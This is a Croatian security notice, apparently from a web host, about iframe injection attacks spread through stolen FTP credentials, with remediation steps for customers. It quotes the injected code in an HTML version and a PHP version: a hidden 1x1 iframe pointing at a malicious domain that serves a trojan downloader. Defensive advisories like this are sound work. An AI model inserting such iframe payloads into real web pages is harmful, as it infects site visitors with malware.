U posljednje vrijeme sve su češći iframe napadi koji u index.* datoteke ubacuju iframe velicine 1×1 piksela. U niže prikazanom codeu, veličina iframea je 1×1 piksel i otvara sadržaj sa goooogleadsence.biz ili neke druge stranice. Taj iframe učitava downloader, koji onda skida trojanca koji  inficira Vaše računalo.

Tipični primjeri su:

HTML stranice

   <iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

PHP stranice

   echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

Sam propust nije na serveru, nego na računalu korisnika. Pregledom logova za svaki slučaj napada koji smo imali, primjetili smo da se napadač (bot) uredno ulogirao na FTP, downloadirao index.* file, izmjenio ga i uploadirao nazad na server.

U ovom trenutku, najbolje rješenje je  izmjena passworda za FTP i cPanel pristup, te čišćenje Vašeg računala. Ukoliko je Vaš web pogođen ovim problemom, otvorite Ticket podrške kako bi izmjenili lozinku FTP-a i cPanela. Od korisnika se zahtijeva da skenira računalo sa nekim kvalitetnim antivirusnim alatom.